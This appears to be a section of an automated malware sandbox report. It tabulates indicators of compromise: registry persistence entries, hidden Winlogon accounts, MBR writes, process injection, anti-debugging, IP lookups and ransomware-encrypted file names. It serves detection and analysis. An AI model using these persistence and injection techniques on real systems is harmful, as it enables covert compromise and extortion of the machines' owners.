    Registry Run Keys / Startup Folder, Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PANOREREDEOPTIM = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Trainbandanigon6\\Styltendeschris.vbs" | 13.exe
    Key created | \Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | mstsc.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | Styltendeschris.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PANOREREDEOPTIM = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Trainbandanigon6\\Styltendeschris.vbs" | Styltendeschris.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\8PB8S29 = "C:\\Program Files (x86)\\Zif6hz\\regsvcojoduf-.exe" | cmmon32.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\"" | 16.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | taskhostw.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | taskhostw.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | 13.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | RegAsm.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Dokumen4 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Dibromob\\PRECONCE.vbs" | 3.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe" | juppp.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\5JZXTPFPDZ = "C:\\Program Files (x86)\\Zfx4lo\\helpqrqlwhj.exe" | mstsc.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\"" | 16.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\feeed = "C:\\Windows\\system32\\pcalua.exe -a C:\\Users\\Admin\\AppData\\Roaming\\feeed.exe" | reg.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | 3.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\ltjqiq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Iarxckfisb\\hmwmcj.exe\"" | hmwmcj.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\ulvetim = "C:\\Users\\Admin\\Singul\\Hyperir.exe" | RegAsm.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\16.exe = "C:\\Windows\\System32\\16.exe" | 16.exe
    Key created | \Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | cmmon32.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\CpSnJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CpSnJ\\CpSnJ.exe" | MSBuild.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    Tags

    TTPs

    Query Registry
  • Checks whether UAC is enabled
    wyfdggaa.exe

    TTPs

    System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | wyfdggaa.exe
  • Drops desktop.ini file(s)
    16.exe, IEXPLORE.EXE

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | 16.exe
    File opened for modification | C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini | 16.exe
    File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Favorites\desktop.ini | 16.exe
    File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Public\Desktop\desktop.ini | 16.exe
    File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | 16.exe
    File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Contacts\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Documents\desktop.ini | 16.exe
    File opened for modification | C:\Users\Public\Pictures\desktop.ini | 16.exe
    File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini | 16.exe
    File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\8DDKLDOL\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | 16.exe
    File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RKGIF8TT\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Desktop\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Music\desktop.ini | 16.exe
    File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Public\Recorded TV\Sample Media\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F6QQJELO\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Searches\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D08RECS3\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M1AZJ0WQ\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | 16.exe
    File opened for modification | C:\Users\Public\Downloads\desktop.ini | 16.exe
    File opened for modification | C:\Users\Public\Recorded TV\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Favorites\Links for United States\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | IEXPLORE.EXE
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Downloads\desktop.ini | 16.exe
    File opened for modification | C:\Program Files (x86)\desktop.ini | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | 16.exe
    File opened for modification | C:\Users\Admin\Pictures\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\Videos\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AT22T7OH\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\F6O5NPVK\desktop.ini | 16.exe
    File opened for modification | C:\Users\Public\desktop.ini | 16.exe
    File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NXBH52U7\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Public\Libraries\desktop.ini | 16.exe
    File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini | 16.exe
    File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | 16.exe
    File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | 16.exe
    File opened for modification | C:\Users\Public\Pictures\Sample Pictures\desktop.ini | 16.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | 16.exe
  • Enumerates connected drives
    msiexec.exe, msiexec.exe, api.exe, msiexec.exe

    Description

    Attempts to read the root path of hard drives other than the default C: drive.

    TTPs

    Query Registry, Peripheral Device Discovery, System Information Discovery

    Reported IOCs

    description | ioc | process
    File opened (read-only) | \??\A: | msiexec.exe
    File opened (read-only) | \??\K: | msiexec.exe
    File opened (read-only) | \??\Z: | msiexec.exe
    File opened (read-only) | \??\F: | msiexec.exe
    File opened (read-only) | \??\A: | api.exe
    File opened (read-only) | \??\R: | api.exe
    File opened (read-only) | \??\U: | api.exe
    File opened (read-only) | \??\V: | msiexec.exe
    File opened (read-only) | \??\X: | msiexec.exe
    File opened (read-only) | \??\M: | msiexec.exe
    File opened (read-only) | \??\Q: | msiexec.exe
    File opened (read-only) | \??\X: | msiexec.exe
    File opened (read-only) | \??\I: | api.exe
    File opened (read-only) | \??\N: | api.exe
    File opened (read-only) | \??\R: | msiexec.exe
    File opened (read-only) | \??\I: | msiexec.exe
    File opened (read-only) | \??\Z: | msiexec.exe
    File opened (read-only) | \??\M: | msiexec.exe
    File opened (read-only) | \??\G: | msiexec.exe
    File opened (read-only) | \??\V: | msiexec.exe
    File opened (read-only) | \??\B: | msiexec.exe
    File opened (read-only) | \??\P: | msiexec.exe
    File opened (read-only) | \??\E: | api.exe
    File opened (read-only) | \??\T: | api.exe
    File opened (read-only) | \??\Z: | api.exe
    File opened (read-only) | \??\P: | msiexec.exe
    File opened (read-only) | \??\Z: | msiexec.exe
    File opened (read-only) | \??\B: | msiexec.exe
    File opened (read-only) | \??\G: | msiexec.exe
    File opened (read-only) | \??\L: | msiexec.exe
    File opened (read-only) | \??\W: | msiexec.exe
    File opened (read-only) | \??\F: | api.exe
    File opened (read-only) | \??\M: | api.exe
    File opened (read-only) | \??\W: | msiexec.exe
    File opened (read-only) | \??\F: | msiexec.exe
    File opened (read-only) | \??\I: | msiexec.exe
    File opened (read-only) | \??\W: | msiexec.exe
    File opened (read-only) | \??\Q: | msiexec.exe
    File opened (read-only) | \??\J: | msiexec.exe
    File opened (read-only) | \??\S: | msiexec.exe
    File opened (read-only) | \??\A: | msiexec.exe
    File opened (read-only) | \??\L: | msiexec.exe
    File opened (read-only) | \??\M: | msiexec.exe
    File opened (read-only) | \??\Q: | msiexec.exe
    File opened (read-only) | \??\S: | msiexec.exe
    File opened (read-only) | \??\H: | msiexec.exe
    File opened (read-only) | \??\O: | msiexec.exe
    File opened (read-only) | \??\Y: | msiexec.exe
    File opened (read-only) | \??\G: | api.exe
    File opened (read-only) | \??\X: | api.exe
    File opened (read-only) | \??\O: | msiexec.exe
    File opened (read-only) | \??\F: | msiexec.exe
    File opened (read-only) | \??\J: | msiexec.exe
    File opened (read-only) | \??\A: | msiexec.exe
    File opened (read-only) | \??\K: | api.exe
    File opened (read-only) | \??\O: | api.exe
    File opened (read-only) | \??\S: | api.exe
    File opened (read-only) | \??\X: | msiexec.exe
    File opened (read-only) | \??\L: | api.exe
    File opened (read-only) | \??\N: | msiexec.exe
    File opened (read-only) | \??\H: | msiexec.exe
    File opened (read-only) | \??\B: | msiexec.exe
    File opened (read-only) | \??\L: | msiexec.exe
    File opened (read-only) | \??\N: | msiexec.exe
  • Legitimate hosting services abused for malware hosting/C2

    TTPs

    Web Service
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flow | ioc
    27 | ip-api.com
    97 | ip-api.com
    115 | ip-api.com
    205 | checkip.amazonaws.com
  • Maps connected drives based on registry
    11.exe, helpqrqlwhj.exe, regsvcojoduf-.exe, 18.exe

    Description

    Disk information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, Peripheral Device Discovery, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | 11.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | helpqrqlwhj.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | helpqrqlwhj.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | regsvcojoduf-.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | regsvcojoduf-.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | 18.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | 18.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | 11.exe
  • Modifies WinLogon
    update.exe, RDPWinst.exe

    TTPs

    Winlogon Helper DLL, Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | update.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | update.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | update.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | update.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | update.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | update.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | RDPWinst.exe
  • Writes to the Master Boot Record (MBR)
    Setup.exe, rundll32.exe, aliens.exe, 0B44010BDDEFEFD3.exe, 0B44010BDDEFEFD3.exe, aliens.exe, MiniThunderPlatform.exe, api.exe

    Description

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    TTPs

    Bootkit

    Reported IOCs

    description | ioc | process
    File opened for modification | \??\PhysicalDrive0 | Setup.exe
    File opened for modification | \??\PhysicalDrive0 | rundll32.exe
    File opened for modification | \??\PhysicalDrive0 | aliens.exe
    File opened for modification | \??\PhysicalDrive0 | 0B44010BDDEFEFD3.exe
    File opened for modification | \??\PhysicalDrive0 | 0B44010BDDEFEFD3.exe
    File opened for modification | \??\PhysicalDrive0 | aliens.exe
    File opened for modification | \??\PhysicalDrive0 | MiniThunderPlatform.exe
    File opened for modification | \??\PhysicalDrive0 | api.exe
  • Drops file in System32 directory
    16.exe, svchost.exe, taskhost.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Windows\System32\16.exe | 16.exe
    File opened for modification | C:\Windows\System32\asyncreg.log | svchost.exe
    File opened for modification | C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb | svchost.exe
    File created | C:\Windows\System32\Info.hta | 16.exe
    File opened for modification | C:\Windows\System32\dnsrsvlr.log | svchost.exe
    File opened for modification | C:\Windows\system32\CatRoot2\edb.chk | svchost.exe
    File opened for modification | C:\Windows\system32\CatRoot2\edb.log | svchost.exe
    File opened for modification | C:\Windows\System32\winmgmts:\localhost\root\CIMV2 | taskhost.exe
    File opened for modification | C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb | svchost.exe
    File opened for modification | C:\Windows\System32\winmgmts:\localhost\ | taskhost.exe
  • Suspicious use of NtSetInformationThreadHideFromDebugger
    Setup.exe, aliens.exe, 19.exe, 3.exe, 13.exe, 20.exe, 25.exe, 15.exe, 23.exe, 28.exe, 7.exe, 3.exe, 31.exe, 13.exe, Styltendeschris.exe, Styltendeschris.exe, 19.exe, aliens.exe, RegAsm.exe

    Reported IOCs

    pid | process
    1288 | Setup.exe
    2952 | aliens.exe
    3008 | 19.exe
    2632 | 3.exe
    1604 | 13.exe
    3136 | 20.exe
    3868 | 25.exe
    1944 | 15.exe
    3744 | 23.exe
    4084 | 28.exe
    1900 | 7.exe
    4288 | 3.exe
    3324 | 31.exe
    4312 | 13.exe
    1908 | Styltendeschris.exe
    3760 | Styltendeschris.exe
    4936 | 19.exe
    3760 | Styltendeschris.exe
    3752 | aliens.exe
    3808 | RegAsm.exe
  • Suspicious use of SetThreadContext
    key.exe, key.exe, 2.exe, 2.exe, key.exe, cmmon32.exe, 18.exe, Setup.exe, rundll32.exe, mstsc.exe, 24.exe, BTRSetp.exe, 3.exe, 13.exe, 9.exe, IconCachenb6h.exe, IconCachenb6h.exe, 30.exe, Styltendeschris.exe, feeed.exe, 26.exe, 11.exe, 19.exe, 11.exe, IconCachenb6h.exe, IconCachenb6h.exe, cmmon32.exe, helpqrqlwhj.exe, 22.exe, IconCachenb6h.exe, IconCachenb6h.exe, 23.exe, IconCachenb6h.exe, IconCachenb6h.exe, IconCachenb6h.exe, IconCachenb6h.exe, IconCachenb6h.exe, IconCachenb6h.exe, regsvcojoduf-.exe, regsvcojoduf-.exe

    Reported IOCs

    description | pid | process | target process
    PID 1236 set thread context of 620 | 1236 | key.exe | key.exe
    PID 1416 set thread context of 2624 | 1416 | key.exe | key.exe
    PID 1076 set thread context of 2148 | 1076 | 2.exe | 2.exe
    PID 2148 set thread context of 1268 | 2148 | 2.exe | Explorer.EXE
    PID 2652 set thread context of 3024 | 2652 | key.exe | key.exe
    PID 2428 set thread context of 1268 | 2428 | cmmon32.exe | Explorer.EXE
    PID 3068 set thread context of 1268 | 3068 | 18.exe | Explorer.EXE
    PID 1288 set thread context of 3284 | 1288 | Setup.exe | rundll32.exe
    PID 1288 set thread context of 3948 | 1288 | Setup.exe | rundll32.exe
    PID 1288 set thread context of 4012 | 1288 | Setup.exe | rundll32.exe
    PID 4012 set thread context of 3132 | 4012 | rundll32.exe | rundll32.exe
    PID 3636 set thread context of 1268 | 3636 | mstsc.exe | Explorer.EXE
    PID 3832 set thread context of 1552 | 3832 | 24.exe | 24.exe
    PID 3396 set thread context of 3968 | 3396 | BTRSetp.exe | BTRSetp.exe
    PID 2632 set thread context of 4288 | 2632 | 3.exe | 3.exe
    PID 1604 set thread context of 4312 | 1604 | 13.exe | 13.exe
    PID 2180 set thread context of 4700 | 2180 | 9.exe | 9.exe
    PID 3844 set thread context of 1548 | 3844 | IconCachenb6h.exe | IconCachenb6h.exe
    PID 1548 set thread context of 1268 | 1548 | IconCachenb6h.exe | Explorer.EXE
    PID 948 set thread context of 4948 | 948 | 30.exe | MSBuild.exe
    PID 1908 set thread context of 3760 | 1908 | Styltendeschris.exe | Styltendeschris.exe
    PID 5016 set thread context of 3704 | 5016 | feeed.exe | InstallUtil.exe
    PID 3956 set thread context of 4580 | 3956 | 26.exe | 26.exe
    PID 1844 set thread context of 2828 | 1844 | 11.exe | 11.exe
    PID 3008 set thread context of 4936 | 3008 | 19.exe | 19.exe
    PID 2828 set thread context of 1268 | 2828 | 11.exe | Explorer.EXE
    PID 2828 set thread context of 1268 | 2828 | 11.exe | Explorer.EXE
    PID 2416 set thread context of 1568 | 2416 | IconCachenb6h.exe | IconCachenb6h.exe
    PID 1568 set thread context of 1268 | 1568 | IconCachenb6h.exe | Explorer.EXE
    PID 4560 set thread context of 1268 | 4560 | cmmon32.exe | Explorer.EXE
    PID 3432 set thread context of 1268 | 3432 | helpqrqlwhj.exe | Explorer.EXE
    PID 3552 set thread context of 4800 | 3552 | 22.exe | vbc.exe
    PID 5052 set thread context of 4032 | 5052 | IconCachenb6h.exe | IconCachenb6h.exe
    PID 4032 set thread context of 1268 | 4032 | IconCachenb6h.exe | Explorer.EXE
    PID 4032 set thread context of 1268 | 4032 | IconCachenb6h.exe | Explorer.EXE
    PID 3744 set thread context of 3808 | 3744 | 23.exe | RegAsm.exe
    PID 4680 set thread context of 2412 | 4680 | IconCachenb6h.exe | IconCachenb6h.exe
    PID 2412 set thread context of 1268 | 2412 | IconCachenb6h.exe | Explorer.EXE
    PID 2412 set thread context of 1268 | 2412 | IconCachenb6h.exe | Explorer.EXE
    PID 5020 set thread context of 3580 | 5020 | IconCachenb6h.exe | IconCachenb6h.exe
    PID 3580 set thread context of 1268 | 3580 | IconCachenb6h.exe | Explorer.EXE
    PID 3580 set thread context of 1268 | 3580 | IconCachenb6h.exe | Explorer.EXE
    PID 3256 set thread context of 4424 | 3256 | IconCachenb6h.exe | IconCachenb6h.exe
    PID 4424 set thread context of 1268 | 4424 | IconCachenb6h.exe | Explorer.EXE
    PID 2428 set thread context of 1208 | 2428 | cmmon32.exe | iexplore.exe
    PID 2428 set thread context of 4436 | 2428 | cmmon32.exe | IEXPLORE.EXE
    PID 2428 set thread context of 4716 | 2428 | cmmon32.exe | iexplore.exe
    PID 5768 set thread context of 4616 | 5768 | regsvcojoduf-.exe | regsvcojoduf-.exe
    PID 4616 set thread context of 1268 | 4616 | regsvcojoduf-.exe | Explorer.EXE
    PID 2428 set thread context of 2568 | 2428 | cmmon32.exe | IEXPLORE.EXE
  • Drops file in Program Files directory
    16.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00486_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0234001.WMF | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00390_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api | 16.exe
    File opened for modification | C:\Program Files\7-Zip\Lang\af.txt.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar | 16.exe
    File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\library.js | 16.exe
    File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105710.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15135_.GIF | 16.exe
    File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png | 16.exe
    File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUECALM\THMBNAIL.PNG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files\Java\jre7\bin\jfxmedia.dll.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files (x86)\Microsoft Office\Office14\NAME.DLL.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OMSMAIN.DLL | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195428.WMF | 16.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PAPYRUS\PAPYRUS.INF | 16.exe
    File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png | 16.exe
    File opened for modification | C:\Program Files\Java\jre7\bin\keytool.exe | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Conversion.v3.5.dll | 16.exe
    File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl.css | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg | 16.exe
    File created | C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
